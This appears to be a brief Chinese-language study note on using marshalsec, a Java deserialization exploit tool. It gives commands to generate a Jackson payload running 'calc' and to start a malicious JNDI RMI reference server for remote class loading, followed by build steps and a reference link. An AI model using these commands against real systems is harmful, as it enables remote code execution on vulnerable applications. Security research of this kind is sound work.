用途
- 用来生成攻击用途的代码,譬如以下几种用法
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8000/#Export 1099
使用过程记录
下载代码
Git clone https://github.com/mbechler/marshalsec
导入IDEA并且编译
- 记得此时junit等的scope不对,应该会报错,因此需要把scope从test变成compile
mvn clean compile install -Dmaven.test.skip=true
参考资料
- 《抽象语法树查找Gadget》https://www.freebuf.com/articles/web/213327.html